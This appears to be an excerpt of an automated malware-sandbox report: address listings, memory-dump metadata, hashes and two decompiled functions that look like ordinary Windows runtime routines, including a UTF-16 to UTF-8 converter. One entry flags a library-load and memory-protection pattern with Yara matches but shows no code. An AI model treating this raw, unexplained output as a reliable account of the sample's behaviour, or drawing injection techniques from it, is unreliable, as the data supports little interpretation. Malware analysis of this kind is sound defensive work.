0x1e3a0f3a
0x1e3a0f49
0x1e3a1108
0x1e3a1108
0x1e3a0f5b
0x1e3a10c7
0x1e3a10ca
0x1e3a10cc
0x00000000
0x00000000
0x1e3a10dc
0x1e3a10de
0x00000000
0x00000000
0x00000000
0x1e3a0f61
0x1e3a0f61
0x1e3a0f61
0x1e3a0f67
0x1e3a0f6b
0x1e3a111d
0x1e3a111d
0x1e3a0f75
0x1e3a0f77
0x1e3a0f77
0x1e3a0f85
0x1e3a0f8b
0x1e3a10b9
0x1e3a10bc
0x1e3feae9
0x1e3feae9
0x1e3a0f91
0x1e3a0f91
0x1e3a0f91
0x1e3a0f96
0x1e3a0f98
0x1e3a0f9a
0x1e3a0f9a
0x1e3a0fa6
0x1e3a107c
0x1e3a107f
0x1e3a108d
0x00000000
0x1e3a108d
0x1e3a1081
0x1e3a1087
0x1e3feaf4
0x1e3feafa
0x00000000
0x00000000
0x00000000
0x1e3feb00
0x00000000
0x1e3a0fac
0x1e3a0fac
0x00000000
0x1e3a0fac
0x1e3a0fa6
0x1e3a0f5b
0x1e3a0f09
0x1e3a0f09
0x00000000
0x1e3a0f09
0x1e3fea63
0x00000000
0x1e3fea63
0x1e3a0ef4
0x00000000
0x00000000
0x00000000
0x1e3a0ef4
0x1e3a0ebc
0x1e3a0ebc
0x00000000
0x1e3a0ebc
0x1e3a0eb6
0x1e3a1149
0x1e3a114c
0x1e3a114d
0x00000000
0x1e3a114d
0x1e3a0ea4
0x1e3a0ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3a0fb7
0x1e3a0fb7
0x1e3a0fbc
0x1e3a0fc9
0x1e3a0fc9
0x1e3a0fce
0x1e3a1020
0x1e3a1025
0x1e3a1094
0x1e3a1094
0x1e3a1099
0x1e3fea04
0x1e3fea04
0x1e3fea09
0x1e3fea1c
0x1e3fea0b
0x1e3fea0b
0x1e3fea0e
0x1e3fea14
0x1e3fea14
0x1e3fea0e
0x1e3fea09
0x1e3a1027
0x1e3a1027
0x1e3a1155
0x1e3a102d
0x1e3a102d
0x1e3a102d
0x1e3a1032
0x1e3fe9fc
0x1e3fe9fc
0x1e3a1032
0x1e3a1027
0x00000000
0x1e3a1025
0x1e3a0fd0
0x1e3fe9f4
0x00000000
0x1e3fe9f4
0x1e3a0fd6
0x1e3a0fd9
0x1e3a1059
0x1e3a1059
0x1e3a105e
0x1e3fe9ec
0x1e3a1064
0x1e3a1064
0x1e3a1064
0x1e3a1069
0x1e3a10ac
0x1e3a106b
0x1e3a106b
0x1e3a106e
0x1e3a1074
0x1e3a1074
0x1e3a106e
0x1e3a1069
0x00000000
0x1e3a105e
0x1e3a0fdb
0x1e3a10a4
0x00000000
0x1e3a10a4
0x1e3a0fe1
0x1e3a0fe4
0x00000000
0x00000000
0x1e3a0fea
0x1e3a0ff1
0x00000000
0x1e3a0ff8
0x00000000
0x00000000
0x1e3fe9e4
0x00000000
0x00000000
0x1e3a1018
0x00000000
0x00000000
0x1e3a1051
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3a0ff1
0x1e3a0fbe
0x1e3a0fc3
0x00000000
0x00000000
0x00000000
0x1e3a0fc3
0x1e3a0df3
0x1e3fe9d5
0x1e3fe9d7
0x1e3a1128
0x1e3a1128
0x1e3a112b
0x1e3a112d
0x1e3a1133
0x1e3a1133
0x00000000
0x1e3a112d
0x00000000
0x1e3fe9d7
0x1e3a0dc2
0x1e3a10f6
0x1e3a0dd4
0x1e3a0dd7
0x1e3a0dda
0x1e3a0de8
0x1e3a0de9
0x1e3a0de9
0x1e3a0dda
0x00000000
0x1e3a0dc2
0x1e3a0dac
0x1e3a0dae
0x1e3a0db3
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d3f00646f9225503ad99a059ca1b3a192abb00ffb62dae1ac5b5f8f6d3e209
Instruction ID: 88f218f0039f003e96c1d8a2eb9c9e775ce3d876f32cb603a9c7f160fa2be351
Opcode Fuzzy Hash: 66d3f00646f9225503ad99a059ca1b3a192abb00ffb62dae1ac5b5f8f6d3e209
Instruction Fuzzy Hash: 96D18C71E046598BDB08CE9AC5A07AEFBF6EFC4350F108369E642E6285D77889C1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1E3B849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1E3B849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x1e47f9c0);
				E1E3FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1e497b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E1E3BCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E1E3C2280( *[fs:0x30], 0x1e498550);
						_t139 =  *0x1e497b04; // 0x8
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E1E3DF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E1E3BFFB0(_t193, _t235, 0x1e498550);
								L5:
								return E1E3FD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E1E3A1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1e497b9c; // 0x0
							_t235 = L1E3C4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1e497b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E1E3DA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E1E3BFFB0(_t193, _t235, 0x1e498550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L1E3C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L1E3C77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1e497b04; // 0x8
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1e497b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E1E3E37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1e497b9c; // 0x0
									_t214 = L1E3C4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E1E3E37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1e497b10 =  *0x1e497b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1e497b04 =  *0x1e497b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L1E3C77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L1E3C77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1e497b08 =  *0x1e497b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E1E3E57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E1E3EF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L1E3C77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E1E3DA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L1E3C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E1E3E96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x1e3b849b
0x1e3b849b
0x1e3b849b
0x1e3b849b
0x1e3b849d
0x1e3b84a2
0x1e3b84a7
0x1e3b84b1
0x1e3b84d8
0x00000000
0x1e3b84b3
0x1e3b84c4
0x1e3b84c9
0x1e3b84cd
0x1e3b84cf
0x1e3b84cf
0x1e3b84d6
0x1e3b84e6
0x1e3b84e9
0x1e3b84ec
0x1e3b84ef
0x1e3b84f2
0x1e3b84f4
0x1e3b84fc
0x1e3b8501
0x1e3b8506
0x1e3b8509
0x1e3b86e0
0x1e3b86e5
0x1e3b86e8
0x1e3b86ed
0x1e3b86f0
0x1e3b86f2
0x1e409afd
0x1e409b02
0x1e3b84da
0x1e3b84df
0x1e3b84df
0x1e3b86fa
0x1e3b86fd
0x1e3b86fe
0x1e3b8701
0x1e3b8706
0x1e3b8709
0x1e3b870b
0x00000000
0x00000000
0x1e3b8711
0x1e3b8725
0x1e3b8727
0x1e3b872a
0x1e3b872c
0x1e409af0
0x1e409af5
0x1e3b8732
0x1e3b8732
0x1e3b8732
0x1e3b8735
0x1e3b8737
0x1e3b8515
0x1e3b8515
0x1e3b8518
0x1e3b851d
0x1e3b8523
0x1e3b8527
0x1e3b852b
0x1e3b8537
0x1e3b8539
0x1e3b853c
0x1e3b853e
0x1e3b868c
0x1e3b8691
0x1e3b8699
0x1e3b869b
0x1e3b8744
0x1e3b8748
0x1e3b86a1
0x1e3b86a1
0x1e3b86a1
0x1e3b86a4
0x1e3b86a8
0x1e409bdf
0x1e409bdf
0x1e3b86ae
0x1e3b86b0
0x00000000
0x1e3b86b6
0x00000000
0x1e409be9
0x1e3b86b0
0x1e3b8544
0x1e3b854a
0x1e3b854d
0x1e3b8551
0x1e3b876e
0x1e3b8778
0x1e3b877b
0x1e3b8780
0x1e3b8557
0x1e3b8557
0x1e3b855d
0x1e3b855d
0x1e3b856b
0x1e3b856e
0x1e3b8570
0x1e3b8573
0x1e3b8576
0x1e3b8576
0x1e3b8579
0x1e3b857b
0x00000000
0x00000000
0x1e3b8581
0x1e3b85a0
0x1e3b85a2
0x1e3b85a5
0x1e3b85a7
0x1e409b1b
0x1e409b1b
0x1e3b862e
0x1e3b862e
0x1e3b8631
0x1e3b8631
0x1e3b8634
0x1e3b8636
0x1e3b8669
0x1e3b8669
0x1e3b866b
0x1e409bbf
0x1e409bc4
0x1e409bc8
0x1e409bce
0x1e409bce
0x1e3b8671
0x1e3b8671
0x1e3b8674
0x1e3b8676
0x1e409bae
0x1e409bae
0x1e3b8676
0x1e3b867c
0x1e3b867e
0x1e3b8688
0x1e3b8688
0x00000000
0x1e3b867e
0x1e3b8638
0x1e3b8638
0x1e3b863b
0x1e3b863e
0x1e3b863f
0x1e3b8642
0x1e3b8645
0x1e3b8648
0x1e3b864d
0x1e409b69
0x1e409b6e
0x1e409b7b
0x1e409b81
0x1e409b85
0x1e409b89
0x1e409ba7
0x1e409b8b
0x1e409b91
0x1e409b9a
0x1e409b9f
0x1e409b9f
0x1e3b8788
0x1e3b878d
0x1e3b8763
0x1e3b8763
0x1e3b8766
0x00000000
0x1e3b8766
0x1e409b70
0x00000000
0x1e409b70
0x1e3b8656
0x1e3b865a
0x1e3b865c
0x1e3b8752
0x1e3b8756
0x00000000
0x00000000
0x1e3b875e
0x00000000
0x1e3b875e
0x1e3b8662
0x1e3b8662
0x1e3b8662
0x1e3b8666
0x00000000
0x1e3b8666
0x1e3b85b7
0x1e3b85b9
0x1e3b85bc
0x1e3b85bf
0x1e3b85cc
0x1e3b85d1
0x1e3b85d4
0x1e3b85db
0x1e3b85de
0x1e3b85e0
0x1e409b5f
0x00000000
0x1e409b5f
0x1e3b85e6
0x1e3b85ea
0x1e3b86c3
0x1e3b86c5
0x1e3b86c8
0x1e3b86ca
0x1e409b16
0x00000000
0x1e409b16
0x1e3b86d6
0x1e3b85f6
0x1e3b85f6
0x1e3b85f9
0x1e3b8602
0x1e3b8606
0x1e3b860a
0x1e3b860b
0x1e3b860e
0x1e3b8611
0x00000000
0x1e3b8611
0x1e3b85f3
0x00000000
0x1e3b85f3
0x1e3b8619
0x1e3b861e
0x1e3b861e
0x1e3b8621
0x1e3b8622
0x1e3b8623
0x1e3b8625
0x1e3b862c
0x00000000
0x1e3b873d
0x00000000
0x1e3b873d
0x1e3b8737
0x1e3b850f
0x1e3b8512
0x00000000
0x1e3b8512
0x00000000
0x1e3b84d6

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61bf93f2e9f6de054cf7a331867d9207b42e87ac9a4a1964f385c057949e966
Instruction ID: b1760c9f35518b44de115f11fcfe3031d6f79abf4204b492c4a9ad03c37a8c15
Opcode Fuzzy Hash: d61bf93f2e9f6de054cf7a331867d9207b42e87ac9a4a1964f385c057949e966
Instruction Fuzzy Hash: FAB16AB8E00259DFDB14CFA9C984A9DFBBAFF88304F10462AE506AB745D770AD45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00567B34, Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 43eac2dc1e1456301a0eea6dccfe3e620e34c33a661fa412f2466028880ae6bd
Instruction ID: 968219f1cf5660cc19a46d041c519209afba63cdb3bfffadd06890f8a7f1892c
Opcode Fuzzy Hash: 43eac2dc1e1456301a0eea6dccfe3e620e34c33a661fa412f2466028880ae6bd
Instruction Fuzzy Hash: BDA12970A483568FDB20DF34C4D4B65BFA1BF66324F5487A9C8968B2D6D731C886C712

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DEBB0, Relevance: .2, Instructions: 250
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1E3DEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E1E3DED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}

0x1e3debb8
0x1e3debbf
0x1e3debc1
0x1e3debc6
0x00000000
0x1e41b6d6
0x1e3debcd
0x1e3debd2
0x1e3dec95
0x1e41b6e0
0x1e3dec9b
0x1e3deca1
0x1e3deca1
0x1e3dec89
0x00000000
0x1e3dec89
0x1e3debd8
0x1e3debdd
0x1e41b6ea
0x00000000
0x1e3debe3
0x1e3debe5
0x1e3debe7
0x1e3debef
0x1e3debf2
0x00000000
0x1e3debf5
0x00000000
0x1e3debf5
0x1e3debf5
0x1e3debf7
0x1e41b6f6
0x1e3dec7c
0x1e3dec7c
0x1e3dec7f
0x1e3dec82
0x1e3dec87
0x00000000
0x1e3dec87
0x1e3dec1a
0x1e3dec1a
0x1e3dec25
0x1e41b725
0x1e41b72c
0x1e41b72c
0x1e3dec2d
0x1e3dec31
0x1e41b73c
0x1e41b744
0x1e41b748
0x1e41b748
0x1e41b749
0x1e41b749
0x1e41b74a
0x1e41b74a
0x1e3dec3e
0x1e41b860
0x00000000
0x1e3dec44
0x1e3dec47
0x1e41b750
0x1e41b758
0x1e41b767
0x1e41b775
0x1e41b77c
0x1e41b77f
0x1e41b769
0x1e41b76c
0x1e41b76c
0x1e41b781
0x1e41b788
0x1e41b78b
0x1e41b75a
0x1e41b75d
0x1e41b75d
0x1e41b78d
0x1e41b792
0x1e41b793
0x1e41b793
0x1e3dec54
0x1e3dec56
0x1e3dec57
0x1e3dec59
0x1e3dec5e
0x1e3decaa
0x1e3ded16
0x1e3ded16
0x1e3decac
0x1e3decaf
0x1e3decb4
0x1e3decb6
0x1e3decb6
0x1e3decb9
0x1e3decbf
0x1e41b7c1
0x1e41b7c8
0x1e41b7d3
0x1e41b7db
0x1e41b7ec
0x1e41b858
0x00000000
0x1e41b858
0x1e41b7ee
0x1e41b7f1
0x1e41b7f4
0x1e41b7ff
0x1e41b850
0x00000000
0x1e41b850
0x1e41b80a
0x1e41b813
0x1e41b81c
0x1e41b81d
0x1e41b822
0x1e41b825
0x1e41b828
0x1e41b831
0x1e41b832
0x1e41b837
0x1e41b840
0x1e41b842
0x1e41b845
0x1e41b848
0x00000000
0x1e41b848
0x1e41b7df
0x00000000
0x1e41b7df
0x1e41b7cc
0x00000000
0x1e41b7cc
0x1e3decc5
0x1e3decc7
0x1e3deccb
0x1e41b79b
0x1e41b79e
0x1e41b7a4
0x00000000
0x00000000
0x1e41b7a6
0x1e41b7a8
0x1e41b7a8
0x1e3decd3
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3decd5
0x1e3decd5
0x1e3decd5
0x1e3decd8
0x1e3decda
0x1e3dece4
0x00000000
0x00000000
0x1e3decea
0x1e3deced
0x1e3decf0
0x1e3decf2
0x1e3decfb
0x1e3decfe
0x1e3ded01
0x1e3ded06
0x00000000
0x00000000
0x00000000
0x1e3ded06
0x1e41b7ae
0x1e41b7b1
0x1e41b7b7
0x00000000
0x00000000
0x1e41b7b9
0x1e41b7bb
0x1e3ded08
0x1e3ded08
0x1e3ded0c
0x1e3ded0c
0x00000000
0x1e3dec60
0x1e3dec62
0x1e3ded0f
0x1e3ded0f
0x00000000
0x1e3ded0f
0x1e3dec68
0x1e3dec6c
0x1e3dec6f
0x1e3dec75
0x1e3dec0d
0x1e3dec0d
0x1e3dec18
0x00000000
0x00000000
0x00000000
0x1e3dec18
0x1e3dec77
0x1e3dec79
0x1e3dec79
0x00000000
0x1e3dec68
0x1e3dec5e
0x1e3dec3e
0x1e3debfd
0x1e3dec02
0x1e41b701
0x1e41b70c
0x1e41b71b
0x1e41b71d
0x1e41b71d
0x00000000
0x1e41b70c
0x1e3dec08
0x1e3dec0a
0x00000000
0x1e3dec0a
0x1e3debf5
0x1e3debf5
